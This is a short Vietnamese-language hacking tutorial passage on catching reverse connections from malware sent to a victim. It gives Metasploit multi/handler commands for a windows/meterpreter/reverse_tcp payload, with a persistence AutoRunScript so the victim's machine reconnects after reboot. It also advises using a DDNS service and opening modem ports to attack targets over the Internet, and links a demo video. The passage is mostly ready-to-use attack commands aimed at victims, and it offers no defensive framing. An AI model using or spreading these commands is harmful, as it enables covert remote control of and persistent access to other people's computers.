Một số lưu ý:
– Khi tấn công ngoài mạng LAN, để hứng được kết nối trở lại, cần sử dụng 1 dịch vụ DDNS như noip.com và nhớ chạy noip để nó tự động Update địa chỉ IP của máy Hacker
– Trong bài này DEMO với Port 4444 và 4567, thì tất cả các port này đều phải được mở trên modem khi tấn công ngoài Internet
Sau khi tạo mã độc và gửi đi, chúng ta thiết lập trên Metasploit như sau
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp (Nếu là Android thì đổi đi)
set LHOST 192.168.1.3
set LPORT 4444
set ExitOnSession False
set AutoRunScript exploits/windows/local/persistence LPORT=4567
exploit -j -z
Trong đó 4567 là port mà victim sẽ kết nối trả về. Trong trường hợp phiên Meterpreter bị Die do bất kì lí do nào (Chẳng hạn victim khởi động lại). Chúng ta sẽ thiết lập Metasploit lắng nghe tại cổng 4567 và chắc chắn sẽ hứng được kết nối từ victim khi khởi động lại
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp (Nếu là Android thì đổi đi)
set LHOST 192.168.1.3
set LPORT 4567
exploit -j
Video Demo
https://www.youtube.com/watch?v=HyENn_joeJ0
Visits: 1132
